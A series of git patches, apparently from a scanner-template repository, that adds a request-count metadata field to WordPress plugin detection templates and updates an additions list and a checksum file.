https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 0af322b728..9d6afa8d3f 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: + max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index b7ad16e281..48481fde3b 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: + max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 10fd071b0b..b34d196268 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: + max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index 401b0e479f..abec174ec3 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: + max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 6f95506748..e088ac07a6 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: + max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 4404f87aab..8b163200bf 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: + max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8995434fce..2366a7dad7 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: + max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8175806cb8..71448e61e8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: + max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index db82bc7f43..717554b89f 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: + max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 03ddae57bc..fba5c8b09c 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: + max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d6449bb5bf..631202198e 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: + max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2d5fdf1779..cc953078eb 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: + max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6b5705e20d..97ce674116 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: + max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index dbcdb64bad..6d05a6f058 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index fb9ea502ce..baf5af3bb5 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 1d41b4ec2c..54dce49b42 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 4fa6fc3ffe..5fae796fdd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1c1c690fcd..22f812e2b8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: + max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4d6702d81a..c637006d26 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: + max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 42cb8bc409..e020507ccb 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: + max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 55d6effbf5..c92903fd79 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: + max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6786cab703..c25b2c1c48 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: + max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 784ba22c8a..4d6dd14d25 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: + max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 72ff55e58a..7ca0870ed6 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: + max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8cfaa0f5a9..4f0d9be568 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: + max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85900a01a7..f3c481b824 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: + max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a7ccde0b49..ba214fd7ea 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: + max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 422664a98c..8f5fe8d9a5 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: + max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f0af3a748a..0458b13354 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: + max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f89f1a20b3..d570be07bf 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: + max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01fb12d0ad..ee05e3add8 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: + max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 1773857e15..df2487955f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: + max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcd1509c68..79ff01211c 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: + max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6aca20a60..23414b3d1d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: + max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 810fc82cde..0178c8e9fb 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: + max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..a04ddc6003 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: + max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 8bdc600063..2ead906817 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: + max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index ab61cc0338..dedd2e23b6 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: + max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..03cd7137a8 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: + max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index d67150d038..a68d4b7d78 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: + max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..bf9dfc3ad8 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: + max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..47911a86a5 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: + max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..1c25b6f488 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: + max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..b36317acd8 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: + max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..5eb35dd17e 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: + max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..ceb2b8d600 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: + max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From 7f4ef87967eef127d7e645c5ad4c45fb6b4e4e47 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 5 Jul 2023 05:56:00 +0000 Subject: [PATCH 380/609] Auto Generated New Template Addition List [Wed Jul 5 05:56:00 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index f93652c3e5..576adfc8b9 100644 --- a/.new-additions +++ b/.new-additions @@ -9,5 +9,6 @@ http/exposed-panels/cloudpanel-login.yaml http/exposed-panels/dell-idrac.yaml http/exposed-panels/efak-login-panel.yaml http/exposed-panels/pritunl-panel.yaml +http/exposed-panels/shell-box.yaml http/exposed-panels/untangle-admin-login.yaml http/exposures/configs/collibra-properties.yaml From b2dc7d911bac81e1a3f565bf64ed1eb5242d6be1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 5 Jul 2023 05:56:07 +0000 Subject: [PATCH 381/609] Auto Generated Templates Checksum [Wed Jul 5 05:56:07 UTC 2023] :robot: --- templates-checksum.txt | 403 +++++++++++++++++++++-------------------- 1 file changed, 202 insertions(+), 201 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index fdd33a7e41..79a85a78d3 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3144,6 +3144,7 @@ http/exposed-panels/sevone-nms-network-manager.yaml:4ac455292f369d1f2b177de0a544 http/exposed-panels/sgp-login-panel.yaml:8280ea2a79b7987c7a2b25dbeb1526637594af3d http/exposed-panels/shardingsphere-panel.yaml:74c74af297b5f4ec3712f8a47714a83e94256477 http/exposed-panels/sharecenter-login.yaml:b6098f3ea9d1d1ff3ef4f46e4ab5350fc731fc27 +http/exposed-panels/shell-box.yaml:8fd5e7a8c0bd465b0db78ed73da625b3dbd139c4 http/exposed-panels/shoutcast-server.yaml:51bd58a83ff87cc4f39123cde0556b2dc35235c0 http/exposed-panels/sicom-panel.yaml:e8f4355647b5cc6f7e052a5cf3f42a72b2f1e31c http/exposed-panels/sidekiq-dashboard.yaml:ececbd632c09fbc52182a12242835a7a29d2b5ea @@ -5341,214 +5342,214 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed -http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e +http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd +http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 -http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc -http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 -http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 -http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b -http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 -http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 -http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 -http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 -http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f 